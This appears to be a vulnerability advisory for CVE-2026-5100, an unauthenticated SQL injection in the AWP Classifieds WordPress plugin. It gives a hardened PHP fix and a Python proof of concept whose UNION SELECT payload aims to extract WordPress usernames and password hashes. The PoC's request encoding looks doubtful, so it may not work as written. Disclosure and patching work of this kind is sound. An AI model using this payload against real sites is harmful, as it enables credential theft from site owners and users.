Security Vulnerability Report
CVE-2026-5100 CVSS 7.5 HIGH

Published: 2026-05-05 03:16:00
Last Modified: 2026-05-05 19:09:32

Description

The AWP Classifieds plugin for WordPress is vulnerable to SQL Injection via the 'regions' parameter array keys in versions up to, and including, 4.4.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
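As an added illustration (not the plugin's own code; the function names and the region table name are assumed), the pattern the description points at, keys of the 'regions' array reaching the query unescaped, is shown beside a hardened version that whitelists the keys and builds the query with $wpdb->prepare():

```php
<?php
// Added illustration, not AWP Classifieds code. Assumes the WordPress $wpdb
// global and a region table name (awpcp_ad_regions) chosen for the example.
// $regions is the decoded 'regions' request array, e.g. regions[12]=1&regions[15]=1,
// so the region ids travel as the array KEYS, not the values.

// Vulnerable pattern: the values get sanitized, the keys do not, and it is
// the keys that are spliced into the SQL.
function regions_sql_vulnerable( array $regions ) {
    $ids = array();
    foreach ( $regions as $region_id => $selected ) {
        if ( absint( $selected ) ) {   // value checked ...
            $ids[] = $region_id;       // ... key copied verbatim
        }
    }
    // Any quote or SQL fragment inside a key lands in the query unchanged.
    return "SELECT ad_id FROM awpcp_ad_regions WHERE region_id IN ('" . implode( "','", $ids ) . "')";
}

// Hardened version: keys must be positive integers (PHP already turns
// canonical numeric-string keys into ints; anything else stays a string and
// is dropped), and the query uses one %d placeholder per id via $wpdb->prepare().
function regions_sql_hardened( array $regions ) {
    global $wpdb;
    $ids = array();
    foreach ( $regions as $region_id => $selected ) {
        if ( is_int( $region_id ) && $region_id > 0 && absint( $selected ) ) {
            $ids[] = $region_id;
        }
    }
    if ( empty( $ids ) ) {
        return null;   // nothing valid to filter on; caller omits the clause
    }
    $placeholders = implode( ',', array_fill( 0, count( $ids ), '%d' ) );
    return $wpdb->prepare(
        "SELECT ad_id FROM {$wpdb->prefix}awpcp_ad_regions WHERE region_id IN ($placeholders)",
        $ids
    );
}
```

Note that escaping the keys with esc_sql() alone would still leave the query assembled by string concatenation; the integer whitelist plus prepare() removes the injection surface rather than filtering it.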

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

AWP Classifieds Plugin <= 4.4.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# Proof of Concept for CVE-2026-5100
# Target: WordPress AWP Classifieds Plugin <= 4.4.5
import requests


def exploit_sqli(target_url):
    # The vulnerability exists in the 'regions' parameter array keys
    # Attackers can inject SQL via the keys of the array
    payload = {
        "regions": {
            # Injecting SQL payload into the array key
            "0' UNION SELECT NULL, user_login, user_pass FROM wp_users-- ": "1"
        }
    }
    try:
        response = requests.post(target_url, data=payload)
        if response.status_code == 200:
            print("[+] Payload sent successfully.")
            print("[+] Check the response for leaked database data.")
            print(response.text[:500])  # Print snippet of response
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
    except Exception as e:
        print(f"[-] An error occurred: {e}")


if __name__ == "__main__":
    url = "http://example.com/wordpress/page-search-ads/"  # Replace with actual target
    exploit_sqli(url)
```

Weakness: CWE-89 (SQL Injection)
Vulnerability status: Deferred

References

https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/frontend/page-search-ads.php#L168
https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/frontend/page-search-ads.php#L174
https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/frontend/page-search-ads.php#L63
https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/frontend/page-search-ads.php#L70
https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/functions.php#L1240
https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/functions.php#L1258
https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/functions.php#L1269
https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/functions.php#L1276
https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/includes/class-awpcp.php#L339
https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/includes/class-awpcp.php#L342
https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/includes/listings/class-query-integration.php#L795
https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/includes/listings/class-query-integration.php#L804
https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/includes/listings/class-query-integration.php#L881
https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/includes/listings/class-query-integration.php#L887
https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/includes/listings/class-query-integration.php#L890
https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/includes/listings/class-query-integration.php#L895
https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/includes/listings/class-query-integration.php#L902
https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/includes/listings/class-query-integration.php#L903
https://www.wordfence.com/threat-intel/vulnerabilities/id/7908d167-f831-4ed0-b754-2b390b5c3b2c?source=cve